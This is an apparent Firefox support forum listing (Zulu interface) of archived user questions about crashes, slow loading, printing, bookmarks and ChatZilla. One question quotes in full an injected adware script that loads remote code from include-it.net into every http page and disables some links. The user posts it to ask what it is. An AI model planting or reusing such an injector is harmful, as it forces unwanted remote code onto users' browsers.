Kukhonjiswa imibuzo ethegiwe: Veza yonke imibuzo
  • Okugcinwe kunqolobane

FF 18.0 Won't even open after update from 17. Crashes in safe mode.

FF17 updated to 18.0 late last week. Running W7 x64. Since the update I cannot even open FF. Crashes upon opening and all I get is the crash report box. Won't even op… (funda kabanzi)

FF17 updated to 18.0 late last week. Running W7 x64. Since the update I cannot even open FF. Crashes upon opening and all I get is the crash report box. Won't even open in safe mode. Had to roll back to 17. This seems to be happening to nearly everyone at my company.

Asked by jmbagley 8 iminyaka edlule

Last reply by philipp 8 iminyaka edlule

  • Okugcinwe kunqolobane

Some Websites won't open .. Only FireFox ,, run in all the others

I try run a web site but it wont load . try it in chrome and IE and it runs smoothly i tried deleting cookies and and even reinstalled every thing i even deleted all th… (funda kabanzi)

I try run a web site but it wont load . try it in chrome and IE and it runs smoothly i tried deleting cookies and and even reinstalled every thing i even deleted all the add-ons So What to do .. i read somewhere that its something to do with dll files .. don't know anything about it ..

Asked by Nawaf_MJ 8 iminyaka edlule

Last reply by Nawaf_MJ 8 iminyaka edlule

  • Okugcinwe kunqolobane

include-it.net why I see this in status bar, when I access any website

(function(){try{if('aol.com,mail.google.com,mystart.incredibar.com,premiumreports.info,search.babylon.com,search.funmoods.com,search.gboxapp.com,search.sweetim.com'.index… (funda kabanzi)

(function(){try{if('aol.com,mail.google.com,mystart.incredibar.com,premiumreports.info,search.babylon.com,search.funmoods.com,search.gboxapp.com,search.sweetim.com'.indexOf(window.self.location.hostname)>-1) return;}catch(e){};if(-1==window.self.location.hostname.indexOf("mail.")){for(i=0;5>i;i++)window.setTimeout(function(){document.getElementById("c2soffer")&&document.getElementById("c2soffer").parentNode.removeChild(document.getElementById("c2soffer"))},100*i);if(-1<window.self.location.hostname.indexOf("isohunt")&&-1<navigator.userAgent.toLowerCase().indexOf("chrome")){var _d=document.createElement("script");_d.type="text/javascript";_d.innerHTML="localStorage.setItem('87r32732ds31',1)";document.getElementsByTagName("head")[0].appendChild(_d)}};;if(window.self.location.protocol=='http:' && window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='http://include-it.net/?p=119';document.getElementsByTagName("head")[0].appendChild(script);};if(document.getElementById('_2bffc94164dd9984ae4826e8bc988721')){for(i=0;i<5;i++){window.setTimeout(function(){try{for (var c = document.getElementsByTagName('a'), i = c.length - 1; i >= 0; --i) if (c[i].id && c[i].id.indexOf('bt_') > -1) c[i].onclick='void(0);';}catch(e){}},i*500);}};})();

Asked by iamsailesh 8 iminyaka edlule

Last reply by brianjnow 8 iminyaka edlule

  • Okugcinwe kunqolobane

Firefox always restoring my presious sessions after close

When I close out of Firefox 17 it always restores my previous session when I open the browser back up, no matter how many tabs I had open before I close. It does not take… (funda kabanzi)

When I close out of Firefox 17 it always restores my previous session when I open the browser back up, no matter how many tabs I had open before I close. It does not take me to my homepage setting, just reloads the previous session before close. All the time. How do I fix this issue?

Asked by Joe 8 iminyaka edlule

Last reply by jweissgerber 8 iminyaka edlule

  • Okugcinwe kunqolobane

i cant get aol in the standard version can only get the basic version right now. How do I fix this

aol was working with no problems but now it loads slow and i can only get the basic version. It works on internet explorer and google chrome with no problems but on fire… (funda kabanzi)

aol was working with no problems but now it loads slow and i can only get the basic version. It works on internet explorer and google chrome with no problems but on firefox that is all i can get and when i try to get the standard version it wont load

Asked by bjroast233 8 iminyaka edlule

Last reply by carneyjerry 8 iminyaka edlule

  • Okugcinwe kunqolobane

Firefox crashes facebook, tumblr and youtube several times a day having to reset firefox atleast once a day

I will be surfing on the websites stated in the question and all of a sudden, the page will go all wonky and even if i refresh, close the window and reopen or even restar… (funda kabanzi)

I will be surfing on the websites stated in the question and all of a sudden, the page will go all wonky and even if i refresh, close the window and reopen or even restart the computer it will still be unable to be used and it's like a plugin is missing and nothing can be clicked and its rendered unusable. It happens multiple times a day and the only fix is to reset firefox which gets really annoying after a while.

Asked by hausofaus 8 iminyaka edlule

Last reply by Crossman72 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

speedtest on firefox is slower than a speedtest on internet explorer i'm talking the halve slower...

when i do a speedtest on speedtest.net i should see a speed result of above 100 mbit cause my connection is 120 mbit down in firefox its always halve like 50 mbit max and… (funda kabanzi)

when i do a speedtest on speedtest.net i should see a speed result of above 100 mbit cause my connection is 120 mbit down

in firefox its always halve like 50 mbit max and in internet explorer it shows the correct speed...

before i never had problems with firefox but with the new updates not...

Asked by broken 8 iminyaka edlule

Answered by philipp 8 iminyaka edlule

  • Okugcinwe kunqolobane

I was told to delete temporary Internet/Cache files on a regular basis. How do I do this?

I have been having trouble with some orders I have made online. The webmaster from one online store told me I should be regularly deleting the temporary Internet/cache fi… (funda kabanzi)

I have been having trouble with some orders I have made online. The webmaster from one online store told me I should be regularly deleting the temporary Internet/cache files. Is this accurate? I know when I do this with Safari, some banking websites want me to enter my passwords again because they say I am using a compute that has not visited this website before. As far as my problem with ordering items online and having problems with the store getting my order, I was told by the webmaster that any good computer practice includes regularly deleting the temporary Internet/cache files. How do I do this on Firefox? I am new to using Firefox. Thanks!

Asked by Kooler 8 iminyaka edlule

Last reply by cor-el 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

when i open a new tab in my home page [ google] the new tab dosen't show google i want the new tab also to open with google

i reinstalled firefox to my desktop the previous one used to show my homepage google when i opened a new tab in my home page .but it doesnot open my homepage google now i… (funda kabanzi)

i reinstalled firefox to my desktop the previous one used to show my homepage google when i opened a new tab in my home page .but it doesnot open my homepage google now it is blank with some rectangular blocks

Asked by sumu 8 iminyaka edlule

Answered by sumu 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

Sort bookmarks alphabetically

When I right-click on a bookmark in a bookmark folder, I am not presented with a way to sort the bookmarks. I am used to IE where there is an option to sort the links (or… (funda kabanzi)

When I right-click on a bookmark in a bookmark folder, I am not presented with a way to sort the bookmarks. I am used to IE where there is an option to sort the links (or folders within a folder) alphabetically with just one click.

Asked by Ryan Nelson 8 iminyaka edlule

Answered by philipp 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

Browser showing little green circle with check mark in it

Can you fix or remove that annoying little green circle with white check mark in it to not show anymore, when I log into the Soundcloud he is there, when I enter on one o… (funda kabanzi)

Can you fix or remove that annoying little green circle with white check mark in it to not show anymore, when I log into the Soundcloud he is there, when I enter on one of forums that I go he is there below RSS feeds on every topic, and on some other sites that I can't remember all of their names I noticed him two, I tried on other browsers and there were no sign of that green circle there.

Here are site names that I found green circle is appering on: http://www.croportal.net/forum/ http://soundcloud.com (when you try to login he is going left and right below logging in message)


here is a screenshot that I catch for you: http://imageshack.us/a/img35/6117/28561320.jpg http://imageshack.us/a/img196/1351/ff2vg.jpg

Asked by Thermaltake 8 iminyaka edlule

Answered by Thermaltake 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

On startup Firefox says "couldn't load XPCOM"

My desktop is running Windows 8, which recently crashed. Since then, every time I start up, Firefox 17.1 (which is in the startuo folder) does not load, but brings up an… (funda kabanzi)

My desktop is running Windows 8, which recently crashed. Since then, every time I start up, Firefox 17.1 (which is in the startuo folder) does not load, but brings up an error window saying (Couldn't load XPCOM). Dismissing the window then allows me to start Firefox myself. I have uninstalled Firefox (but not the personal stuff), downloaded a new copy of Firefox 17.1 and re-installed.... same thing happens.

Just to clarify ..... this only happens once, following the initial boot up of the desktop. I dismiss the error window and all is well after that.

Any bright ideas please?

What is XPCOM referring to? A missing dll file? can I find this file elsewhere and move it to the correct location?

Many regards.

Asked by dinosauregg 8 iminyaka edlule

Answered by dinosauregg 8 iminyaka edlule

  • Okugcinwe kunqolobane

Broken icon fonts in some sites: github, coursera,...

I've been using a custom font (DejaVu) with unchecked "allow sites to use their own fonts" since a long time. But now some sites came with this new idea of icon fonts tha… (funda kabanzi)

I've been using a custom font (DejaVu) with unchecked "allow sites to use their own fonts" since a long time. But now some sites came with this new idea of icon fonts that look completely broken (a weird box with crazy stuff inside) until I globally check "allow sites to use their own fonts". Is there any way to configure different fonts per site? Specifically I would like to keep my all time configuration except for these specific sites which should be loading their beloved fonts.

Regards -- Carlos

Asked by memeplex 8 iminyaka edlule

Last reply by ftobin 7 iminyaka edlule

  • Okugcinwe kunqolobane

Can't log on to my banking website(M&T) but I can in Internet Explorer. Happened within the last week or 2.

Can't log on to my online banking site, but it works in IE: https://onlinebanking.mandtbank.com/SignOn.aspx https://www.mtb.com/personal/Pages/Index.aspx Gives me a syste… (funda kabanzi)

Can't log on to my online banking site, but it works in IE: https://onlinebanking.mandtbank.com/SignOn.aspx https://www.mtb.com/personal/Pages/Index.aspx

Gives me a system error(no error code)

Asked by jimbodeako 8 iminyaka edlule

Last reply by bridgford 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

Printing selected text crops off part of first line - bug report 696566 - any help coming or workarounds?

Previous reports of this problem in this forum have had their threads closed. This is still a bug in FF 17.0.1, and has a bug report of 696566. One suggested solution o… (funda kabanzi)

Previous reports of this problem in this forum have had their threads closed. This is still a bug in FF 17.0.1, and has a bug report of 696566. One suggested solution of setting print scaling to 90% does not have any effect.

Asked by dsttexas 8 iminyaka edlule

Answered by John99 8 iminyaka edlule

  • Okugcinwe kunqolobane

Firefox17 is extremely slow on the net compared with MS Internet Explorer. Can I downgrade it and not loose bookmarks and how?

I have upgrade my Firefox to the 17 version and it worked just fine from the beginning but it have become slower and slower on communication to the internet. I have used … (funda kabanzi)

I have upgrade my Firefox to the 17 version and it worked just fine from the beginning but it have become slower and slower on communication to the internet. I have used your product for some time and I like it but this is not ok. I upgrade the system as soon as there is something new. It is important for me to be able to save the bookmarks. I use the Swedish version!

Asked by Lasal 8 iminyaka edlule

Last reply by gerald100 8 iminyaka edlule

  • Okugcinwe kunqolobane

Background printing does not work

Background images does not print from today from about 12.30pm Changed nothing. Not sure if FF updated during the period or not. Did restore to 6am to make sure. Reset Fi… (funda kabanzi)

Background images does not print from today from about 12.30pm

Changed nothing. Not sure if FF updated during the period or not. Did restore to 6am to make sure. Reset Firefox. Restarted computer. Checked printer drivers - ok.

Shows up without background images in "print preview". But no difference when pressing print background images/not.

Worked fine prior to 12.30pm today.

Any ideas?

Asked by squirrelboy 8 iminyaka edlule

Last reply by squirrelboy 8 iminyaka edlule

  • Kusonjululiwe
  • Okugcinwe kunqolobane

I just installed Chatzilla to access IRC. I can connect, log into a server, and join a channel...but there are no incomming messages.

As stated, I can get all the way to being able to join a channel, but I don't any 'chatting' going on. I can see the user list, I can see the MOTD, I can do a listing, b… (funda kabanzi)

As stated, I can get all the way to being able to join a channel, but I don't any 'chatting' going on. I can see the user list, I can see the MOTD, I can do a listing, but no incoming traffic from the channel. I installed mIRC just to see, but same thing. I am thinking that there is some generic setting common to both clients that I am missing somehow, but I really don't know.

Is this a common error that I might be making? Is it a connectivity issue, or similar?

There is not a lot of info regarding this specific problem that I can find.

What do you guys think?

Asked by BobbyEarle 8 iminyaka edlule

Answered by Svetlana 8 iminyaka edlule